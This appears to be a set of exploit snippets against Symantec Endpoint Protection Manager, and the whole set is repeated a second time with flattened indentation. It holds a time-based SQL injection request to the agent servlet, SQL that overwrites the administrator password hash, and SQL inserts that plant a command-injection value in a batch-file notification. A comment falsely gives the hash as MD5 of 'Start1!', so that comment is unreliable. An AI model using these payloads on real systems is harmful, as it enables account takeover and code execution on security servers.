mwulftange/SemAdministrator.xml

## cacls-SyKnApps-Updates
C:\>cacls C:\ProgramData\Symantec\SyKnAppS\Updates
C:\ProgramData\Symantec\SyKnAppS\Updates NT AUTHORITY\SYSTEM:(OI)(CI)F
                                         BUILTIN\Administrators:(OI)(CI)F
                                         NT AUTHORITY\SYSTEM:F
                                         CREATOR OWNER:(OI)(CI)(IO)(ID)F
                                         BUILTIN\Users:(OI)(CI)R
                                         BUILTIN\Users:(CI)(special access:)
                                                           FILE_WRITE_DATA
                                                           FILE_APPEND_DATA
                                                           FILE_WRITE_EA
                                                           FILE_WRITE_ATTRIBUTES

## create-SecurityAlertNotifyTask.sql
INSERT INTO alerts (idx, alert_idx, virusname_idx, alertinserttime)
    VALUES ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA', 1, 'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC', CURRENT_TIMESTAMP);

INSERT INTO notification (notag_idx, type, user_id, virus, email, lastrun, triggered, batch_file_name)
    VALUES ('BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB', 'NV', (SELECT TOP 1 user_id FROM adminuser), '"&calc&"', 'batchfile', 0, 0, 'dbtools.bat');

INSERT INTO virus (virusname_idx, virusname)
    VALUES ('CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC', (SELECT virus FROM notification WHERE notag_idx = 'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'));

## reset-SemAdministrator.sql
-- reset admin password
BEGIN
	DECLARE
		@SemConfigRoot varchar(max),
		@s varchar(max),
		@start bigint,
		@length bigint;

	SELECT
		@SemConfigRoot = CONVERT(varchar(max),CONVERT(varbinary(max),content)),
		@start = PATINDEX('%<SemAdministrator %', @SemConfigRoot),
		@length = PATINDEX('%</SemAdministrator>%', @SemConfigRoot) - @start + 18,
		@s = SUBSTRING(@SemConfigRoot, @start, @length),
		@s = REPLACE(@s, ' PasswordHash="21232F297A57A5A743894A0E4A801FC3" OldPasswordHash=', ' PasswordHash='),
		@SemConfigRoot = STUFF(@SemConfigRoot, @start, @length, @s)
	FROM
		basic_metadata
	WHERE
		id = 'B655E64D0A320801000000E164041B79';

	UPDATE
		basic_metadata
	SET
		content = CONVERT(image,CONVERT(varbinary(max),@SemConfigRoot)),
		checksum = UPPER(SUBSTRING(master.dbo.fn_varbintohexstr(HASHBYTES('MD5',@SemConfigRoot)),3,32))
	WHERE
		id = 'B655E64D0A320801000000E164041B79';
END;

## SemAdministrator.xml
<SemAdministrator
    CreationTime="1450248162172"
    EmailAddress="admin@localhost.local"
    Id="AF3C39A10A320801000000DBF200C60A"
    Name="admin"
    PasswordHash="21232F297A57A5A743894A0E4A801FC3"
    _d="false"
    _i="6F335DE8C0A80101003F6843927F3521"
    _t="1450248162172"
    _v="3">

## sql-injection-request
POST /servlet/AgentServlet HTTP/1.1
Host: 192.168.40.133:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 781

ActionType=AgentRegister&RequestData=<SSARegData NameSpace="rpc">
	<AgentInfo
		DomainID="7C6968400A32025E01DF280BC7C27AE0"
		AgentType="AgentType"
		AgentID="AgentID"
		LegacyAgentID="LegacyAgentID"
		HardwareKey="lala'; waitfor delay '00:00:03'--"
		UserDomain="UserDomain"
		LoginUser="LoginUser"
		ComputerDomain="ComputerDomain"
		ComputerName="ComputerName"
		PreferredGroup="PreferredGroup"
		PreferredMode="0"
		SiteDomainName="SiteDomainName"
		IsLicensed="1"
		AgentPlatform="AgentPlatform"
	/>
</SSARegData>

## update-SemAdministrator.sql
-- set new admin password: MD5('Start1!') = '21232F297A57A5A743894A0E4A801FC3'
BEGIN
	DECLARE
		@SemConfigRoot varchar(max),
		@s varchar(max),
		@start bigint,
		@length bigint;

	SELECT
    	@SemConfigRoot = CONVERT(varchar(max),CONVERT(varbinary(max),content)),
    	@start = PATINDEX('<SemAdministrator %', @SemConfigRoot),
    	@length = PATINDEX('</SemAdministrator>%', @SemConfigRoot) - @start + 18,
    	@s = SUBSTRING(@SemConfigRoot, @start, @length),
    	@s = REPLACE(@s, ' PasswordHash="21232F297A57A5A743894A0E4A801FC3" OldPasswordHash=', ' PasswordHash='),
    	@s = REPLACE(@s, ' PasswordHash=', ' PasswordHash="21232F297A57A5A743894A0E4A801FC3" OldPasswordHash='),
    	@SemConfigRoot = STUFF(@SemConfigRoot, @start, @length, @s)
    FROM
    	basic_metadata
    WHERE
    	ID = 'B655E64D0A320801000000E164041B79';

	UPDATE
		basic_metadata
	SET
		content = CONVERT(image,CONVERT(varbinary(max),@SemConfigRoot)),
		checksum = UPPER(SUBSTRING(master.dbo.fn_varbintohexstr(HASHBYTES('MD5',@SemConfigRoot)),3,32))
	WHERE
		id = 'B655E64D0A320801000000E164041B79';
END;
	C:\>cacls C:\ProgramData\Symantec\SyKnAppS\Updates
	C:\ProgramData\Symantec\SyKnAppS\Updates NT AUTHORITY\SYSTEM:(OI)(CI)F
	BUILTIN\Administrators:(OI)(CI)F
	NT AUTHORITY\SYSTEM:F
	CREATOR OWNER:(OI)(CI)(IO)(ID)F
	BUILTIN\Users:(OI)(CI)R
	BUILTIN\Users:(CI)(special access:)
	FILE_WRITE_DATA
	FILE_APPEND_DATA
	FILE_WRITE_EA
	FILE_WRITE_ATTRIBUTES
	INSERT INTO alerts (idx, alert_idx, virusname_idx, alertinserttime)
	VALUES ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA', 1, 'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC', CURRENT_TIMESTAMP);

	INSERT INTO notification (notag_idx, type, user_id, virus, email, lastrun, triggered, batch_file_name)
	VALUES ('BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB', 'NV', (SELECT TOP 1 user_id FROM adminuser), '"&calc&"', 'batchfile', 0, 0, 'dbtools.bat');

	INSERT INTO virus (virusname_idx, virusname)
	VALUES ('CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC', (SELECT virus FROM notification WHERE notag_idx = 'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'));
	-- reset admin password
	BEGIN
	DECLARE
	@SemConfigRoot varchar(max),
	@s varchar(max),
	@start bigint,
	@length bigint;

	SELECT
	@SemConfigRoot = CONVERT(varchar(max),CONVERT(varbinary(max),content)),
	@start = PATINDEX('%<SemAdministrator %', @SemConfigRoot),
	@length = PATINDEX('%</SemAdministrator>%', @SemConfigRoot) - @start + 18,
	@s = SUBSTRING(@SemConfigRoot, @start, @length),
	@s = REPLACE(@s, ' PasswordHash="21232F297A57A5A743894A0E4A801FC3" OldPasswordHash=', ' PasswordHash='),
	@SemConfigRoot = STUFF(@SemConfigRoot, @start, @length, @s)
	FROM
	basic_metadata
	WHERE
	id = 'B655E64D0A320801000000E164041B79';

	UPDATE
	basic_metadata
	SET
	content = CONVERT(image,CONVERT(varbinary(max),@SemConfigRoot)),
	checksum = UPPER(SUBSTRING(master.dbo.fn_varbintohexstr(HASHBYTES('MD5',@SemConfigRoot)),3,32))
	WHERE
	id = 'B655E64D0A320801000000E164041B79';
	END;
	<SemAdministrator
	CreationTime="1450248162172"
	EmailAddress="admin@localhost.local"
	Id="AF3C39A10A320801000000DBF200C60A"
	Name="admin"
	PasswordHash="21232F297A57A5A743894A0E4A801FC3"
	_d="false"
	_i="6F335DE8C0A80101003F6843927F3521"
	_t="1450248162172"
	_v="3">
	POST /servlet/AgentServlet HTTP/1.1
	Host: 192.168.40.133:8443
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 781

	ActionType=AgentRegister&RequestData=<SSARegData NameSpace="rpc">
	<AgentInfo
	DomainID="7C6968400A32025E01DF280BC7C27AE0"
	AgentType="AgentType"
	AgentID="AgentID"
	LegacyAgentID="LegacyAgentID"
	HardwareKey="lala'; waitfor delay '00:00:03'--"
	UserDomain="UserDomain"
	LoginUser="LoginUser"
	ComputerDomain="ComputerDomain"
	ComputerName="ComputerName"
	PreferredGroup="PreferredGroup"
	PreferredMode="0"
	SiteDomainName="SiteDomainName"
	IsLicensed="1"
	AgentPlatform="AgentPlatform"
	/>
	</SSARegData>
	-- set new admin password: MD5('Start1!') = '21232F297A57A5A743894A0E4A801FC3'
	BEGIN
	DECLARE
	@SemConfigRoot varchar(max),
	@s varchar(max),
	@start bigint,
	@length bigint;

	SELECT
	@SemConfigRoot = CONVERT(varchar(max),CONVERT(varbinary(max),content)),
	@start = PATINDEX('<SemAdministrator %', @SemConfigRoot),
	@length = PATINDEX('</SemAdministrator>%', @SemConfigRoot) - @start + 18,
	@s = SUBSTRING(@SemConfigRoot, @start, @length),
	@s = REPLACE(@s, ' PasswordHash="21232F297A57A5A743894A0E4A801FC3" OldPasswordHash=', ' PasswordHash='),
	@s = REPLACE(@s, ' PasswordHash=', ' PasswordHash="21232F297A57A5A743894A0E4A801FC3" OldPasswordHash='),
	@SemConfigRoot = STUFF(@SemConfigRoot, @start, @length, @s)
	FROM
	basic_metadata
	WHERE
	ID = 'B655E64D0A320801000000E164041B79';

	UPDATE
	basic_metadata
	SET
	content = CONVERT(image,CONVERT(varbinary(max),@SemConfigRoot)),
	checksum = UPPER(SUBSTRING(master.dbo.fn_varbintohexstr(HASHBYTES('MD5',@SemConfigRoot)),3,32))
	WHERE
	id = 'B655E64D0A320801000000E164041B79';
	END;